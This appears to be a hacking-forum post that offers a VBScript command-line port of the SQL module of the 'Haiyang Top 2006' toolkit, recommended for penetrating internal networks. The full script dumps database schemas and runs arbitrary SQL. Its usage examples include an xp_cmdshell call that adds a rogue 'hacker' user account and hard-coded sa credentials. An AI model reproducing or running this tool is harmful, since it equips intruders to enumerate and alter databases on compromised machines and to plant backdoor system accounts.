花了一點時間把以前的海陽頂端2006的sql模塊改成vbs版了,和它的功能是一模一樣的,不過用起來可能沒有asp版的舒服,不過能用,可以用在dos下了,滲透內網時估計你用得著。
if (lcase(right(wscript.fullname,11))="wscript.exe") then
echo "Execute it under the cmd.exe Plz! Thx."
echo "code by lcx"
wscript.quit
end If
if wscript.arguments.count<1 then
echo "Usage: cscript sql.vbs showTables e:/hytop.mdb或sql:Provider=SQLOLEDB.1;Server=localhost;User ID=sa;Password=haiyangtop;Database=bbs;"
echo "usage: cscript sql.vbs query 連接字符串 <表名=default:""""> sql語句 <頁數=default:1>"
echo "exp:cscript sql.vbs showTables "&Chr(34)&"sql:Provider=SQLOLEDB.1;Server=localhost;User ID=sa;Password=haiyangtop;Database=bbs"&Chr(34)
echo "exp:cscript sql.vbs query "&Chr(34)&"sql:Provider=SQLOLEDB.1;Server=localhost;User ID=sa;Password=haiyangtop;Database=bbs"&Chr(34)&Space(1) &Chr(34)&Chr(34)&Space(1)&Chr(34)&"select * from name"&chr(34)&Space(1) & 1
echo "exp:cscript sql.vbs query "&Chr(34)&"sql:Provider=SQLOLEDB.1;Server=localhost;User ID=sa;Password=haiyangtop;Database=bbs"&Chr(34)&Space(1) &Chr(34)&Chr(34)&Space(1)&Chr(34)&"update....."&chr(34)&Space(1) & 1
echo "exp:cscript sql.vbs query "&Chr(34)&"sql:Provider=SQLOLEDB.1;Server=localhost;User ID=sa;Password=haiyangtop;Database=bbs"&Chr(34)&Space(1) &Chr(34)&Chr(34)&Space(1)&Chr(34)&"exec master.dbo.xp_cmdshell 'net user ice hacker /add'--"&chr(34)&Space(1) & 1
end If
Sub chkErr(Err)
If Err Then
echo "錯誤: " & Err.Description & "錯誤源: " & Err.Source & vbcrlf
Err.Clear
wscript.quit
End If
End Sub
Sub echo(str)
wscript.echo str
End Sub
Function fixNull(str)
If IsNull(str) Then
str = " "
End If
fixNull = str
End Function
Sub showErr(str)
Dim i, arrayStr
arrayStr = Split(str, "$$")
echo "出錯信息:"&vbcrlf
For i = 0 To UBound(arrayStr)
echo (i + 1) & ". " & arrayStr(i) & "<br/>"
Next
echo vbcrlf
wscript.quit
End Sub
Rem =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Rem 下面是程序模塊選擇部分
Rem =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
PageMsDataBase()
Sub pageMsDataBase()
Dim theAct, sqlStr
theAct = Wscript.Arguments(0)
sqlStr = Wscript.Arguments(1)
Select Case theAct
Case "showTables"
showTables()
Case "query"
showQuery()
End Select
End Sub
Sub showTables()
Dim conn, sqlStr, rsTable, rsColumn, connStr, tablesStr
sqlStr = Wscript.Arguments(1)
If LCase(Left(sqlStr, 4)) = "sql:" Then
connStr = Mid(sqlStr, 5)
Else
connStr = "Provider=Microsoft.Jet.Oledb.4.0;Data Source=" & sqlStr
End If
Set conn = CreateObject("Adodb.Connection")
conn.Open connStr
chkErr(Err)
tablesStr = getTableList(conn, sqlStr, rsTable)
echo tablesStr & "================================================="
Do Until rsTable.Eof
Set rsColumn = conn.OpenSchema(4, Array(Empty, Empty, rsTable("Table_Name").value))
echo rsTable("Table_Name") &vbcrlf
Do Until rsColumn.Eof
echo "字段名:" & rsColumn("Column_Name")&vbclrf
echo "類型:" & getDataType(rsColumn("Data_Type")) & vbclrf
echo "大小:" & rsColumn("Character_Maximum_Length") & vbclrf
echo "精度:" & rsColumn("Numeric_Precision") & vbclrf
echo "允許為空:" & rsColumn("Is_Nullable") & vbclrf
echo "默認值:" & rsColumn("Column_Default") & vbclrf&vbclrf
rsColumn.MoveNext
Loop
rsTable.MoveNext
echo vbcrlf
Loop
echo "==============================================================="
conn.Close
Set conn = Nothing
Set rsTable = Nothing
Set rsColumn = Nothing
End Sub
Sub showQuery()
Dim i, j, rs, sql, page, conn, sqlStr, connStr, rsTable, tablesStr, theTable
sqlStr = Wscript.Arguments(1)
theTable = Wscript.Arguments(2)
sql=Wscript.Arguments(3)
page=Wscript.Arguments(4)
If Not IsNumeric(page) or page = "" Then
page = 1
End If
If LCase(Left(sqlStr, 4)) = "sql:" Then
connStr = Mid(sqlStr, 5)
Else
connStr = "Provider=Microsoft.Jet.Oledb.4.0;Data Source=" & sqlStr
End If
Set rs = CreateObject("Adodb.RecordSet")
Set conn = CreateObject("Adodb.Connection")
conn.Open connStr
chkErr(Err)
tablesStr = getTableList(conn, sqlStr, rsTable)
echo "數據庫表結構查看:"
echo tablesStr & "========================================================"
echo ">SQL命令執行及查看<:"&vbcrlf
If sql <> "" And Left(LCase(sql), 7) = "select " Then
rs.Open sql, conn, 1, 1
chkErr(Err)
rs.PageSize = 20
If Not rs.Eof Then
rs.AbsolutePage = page
End If
If rs.Fields.Count>0 Then
echo "SQL操作 - 執行結果"&vbcrlf
echo "===================="&theTable&"列名如下========================================"
For j = 0 To rs.Fields.Count-1
echo rs.Fields(j).Name & vbcrlf
Next
For i = 1 To 20
If rs.Eof Then
Exit For
End If
For j = 0 To rs.Fields.Count-1
echo fixNull(rs(j))& vbcrlf
Next
rs.MoveNext
Next
End If
echo "================================================================="
echo " 共有"&rs.Fields.Count&"列" & vbcrlf
For i = 1 To rs.PageCount
page=i
Next
echo " 共有" & page & "頁"
rs.Close
Else
If sql <> "" Then
conn.Execute(sql)
chkErr(Err)
echo "執行完畢!"&vbcrlf
End If
End If
conn.Close
Set rs = Nothing
Set conn = Nothing
Set rsTable = Nothing
End Sub
Function getDataType(typeId)
Select Case typeId
Case 130
getDataType = "文本"
Case 2
getDataType = "整型"
Case 3
getDataType = "長整型"
Case 7
getDataType = "日期/時間"
Case 5
getDataType = "雙精度型"
Case 11
getDataType = "是/否"
Case 128
getDataType = "OLE 對象"
Case Else
getDataType = typeId
End Select
End Function
Function getTableList(conn, sqlStr, rsTable)
Set rsTable = conn.OpenSchema(20, Array(Empty, Empty, Empty, "table"))
echo "存在以下表名:"
Do Until rsTable.Eof
getTableList = getTableList & "["& rsTable("Table_Name") & "]"&vbcrlf
rsTable.MoveNext
Loop
rsTable.MoveFirst
End Function
